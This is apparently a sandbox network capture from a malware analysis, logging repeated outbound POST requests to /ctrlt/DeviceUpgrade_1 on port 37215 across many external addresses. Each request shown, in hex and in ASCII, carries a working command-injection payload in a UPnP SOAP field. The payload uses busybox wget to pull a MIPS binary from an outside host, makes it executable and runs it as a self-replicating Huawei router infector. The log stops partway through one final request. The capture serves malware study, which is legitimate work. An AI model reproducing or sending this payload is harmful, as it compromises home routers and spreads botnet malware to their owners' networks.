                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1606192.168.2.1353946157.19.159.21237215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:20.588161945 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1607192.168.2.133704227.33.97.5437215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:20.588613033 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1608192.168.2.1339452197.188.220.23537215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:20.588629007 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1609192.168.2.1356492197.68.47.8637215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:20.588711977 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1610192.168.2.1341952157.251.145.11737215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:20.588769913 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1611192.168.2.1334546197.24.99.10837215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:20.588773012 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1612192.168.2.1334394157.173.27.937215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:20.588777065 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1613192.168.2.1341202162.248.20.3437215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:20.589350939 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1614192.168.2.1352482157.7.70.19737215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:20.589385986 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1615192.168.2.133562254.31.229.22237215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:20.589642048 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
